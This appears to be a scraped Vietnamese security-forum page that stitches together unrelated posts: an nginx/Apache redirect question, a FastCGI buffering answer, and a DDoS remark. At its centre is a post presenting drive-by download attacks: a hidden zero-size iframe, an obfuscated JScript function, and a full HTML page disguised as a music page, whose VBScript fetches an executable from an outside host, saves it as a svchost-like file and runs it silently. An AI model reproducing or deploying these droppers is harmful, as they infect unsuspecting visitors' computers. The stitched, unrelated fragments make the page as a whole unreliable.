Hi, giúp em vấn đề này với.

Em đã setup nginx và chạy thành công nhưng bị lỗi này.

File config em như sau:
-nginx listen ở port 80
-apache listen ở port 8000
-forum em chạy vbb
Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này?

Thân.
 

LlyKil wrote:

Thực ra vấn đề này hơi khó giải thích vì đây chỉ là chi tiết nhỏ trong cách "trả lời" request. Cụ thể thì mình đã mô tả như trên.

Tuy không ảnh hưởng gì đến quá trình xử lý hay trả kết quả từ webserver về nhưng mình cũng muốn tìm hiểu.
Mình chỉ thắc mắc là vì sao nếu chuyển sang CGI hay ISAPI thì không như vậy. Có lẽ đây là đặc tính/kiểu riêng của FCGI.

Cảm ơn conmale đã reply cho thread này. 

Lý do nó là vì server không hơi đâu mà trả về client từng byte data mà nó phải có 1 buffer để lưu lại output từ script, khi đầy buffer nó trả về 1 lần luôn thì hiệu xuất sẽ tốt hơn nhiều so với việc cứ có byte nào thì trả về byte đó.
Thông thường thì với CGI, server nó giao lại hết execution cho CGI nên gần như CGI script có data gì là server nó trả lại cho client ngay nên bạn thấy data nó ra từ từ. ISAPI thì tôi không rõ lắm, nhưng FCGI thì mặc định nó đã có cái output buffer rồi nên nó sẽ không trả về client từ byte đâu mà đợi đầy buffer (hoặc script kết thúc) nó mới trả về luôn 1 lần.
Mà nhìn qua thì có vẻ như server của bạn là Win, chạy IIS? Nếu không có nhu cầu chạy ASP/.NET mà chỉ chạy PHP thôi thì sao không sử dụng Apache? 

Cách 1:

Sử dụng phương thức IFrame chèn vào site tự rect link tới 1 site có chèn code tự động download virus:

<iframe src=http://www.webcuaban.com/pagecovirus.htm width=0 height=0></iframe>

Hoặc là một thẻ meta cho phép wwwect đến một site khác. Các site link vào tất cả đều là link virus. Tại thời điểm đó còn rất nhiều trình duyệt bị lỗi và chưa kịp update, ngay cả Firefox cũng dính. Khi người dùng internet vào các trang web đã bị thêm dòng như trên thì nó sẽ tự động download virus về máy mà không hề hay biết hoặc nó sẽ hiện ra 1 cái của sổ và bạn cứ thế bấm vào nút đồng ý. Vậy là máy tính bị dính virus.

Ví dụ cái link trên có đoạn code download con virus :

Code:

function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ipt.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"ream");
var e = s.Environment("Process");
var xml = null;
var url = 'http://www.webcuaban.com/Virus.exe';
var bin = e.Item("TEMP") + "svchosts.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHTTP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}
if (! xml) return(0);
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
s.Run(bin,0);
}

Con virus có link url = 'http://www.webcuaban.com/Virus.exe'; sẽ được lưu xuống máy nạn nhân với tên svchosts.exe
Các con virus này thậm trí có khả năng lây qua USB, nên nó nhân bản ra khá nhanh.

Cách 2:

Gần đây có nhiều con virus viết bằng autoIT3 như là:
http://www.webcuaban.com/YMBEST/

http://viet8x.evonet.ro
Download tại đây : http://www.autoitscript.com/autoit3/
(Không khuyến cáo các bạn dùng thử). Tuy nhiên sài được thì rất Kool, có thể giả lập các phím bấm, các nút truột thậm trí giao diện không thua gì soft code bằng các language như C, C++, C#.......

Code:

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Audition">
<title>Nghe nhạc Audition | Hyo Ri Lee - 10 Minutes!</title>
</head>
<body bgcolor=black>
<script language="VBScript">
on error resume next
dl = "http://www.webcuaban.com/guitangban.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svchost32.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<div align = center>
<h2><font color=#FFFFFF>Các bạn đang nghe bài Hyo Ri Lee - 10 Minutes</font></h2>
<embed src="http://ladymoonlight.org/Hyo Ri Lee - 10 Minutes.mp3" autostart="true" >
</div>
<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=1874708;
var sc_invisible=1;
var sc_partition=17;
var sc_security="ae164a82";
var sc_remove_link=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><img src="http://c18.statcounter.com/counter.php?sc_project=1874708&java=0&security=ae164a82&invisible=1" alt="unique visitor counter" border="0"> </noscript>
<!-- End of StatCounter Code -->
</body>
</html>

© by: LKL!!!

Không khuyến khích sử dụng với mục đích ko lành mạnh!
Không chịu trách nhiệm dưới mọi hình thức áp dụng!!!

Thân LKL!!!

Xin lỗi BQT nếu thấy bài này có vấn đề ko hay cho định hướng của HVA thì làm ơn Move To Trash giúp LKL!!!
Thân mến!!! 

Riêng tôi thấy cách chống DDoS của HVA thì thực sự có hiệu quả và có thể cho tôi biết làm như thế nào ? 

Mình thì ko có kiến thức để bàn vấn đề của bạn trên kia , nhưng thú thật đọc câu này mình rất ư là buồn cười DOS thì đâu cần phải có user và password thì phải
DOS mà cứ ngồi đánh F5, enter với click thì kẻ tấn công phải rảnh lắm đây!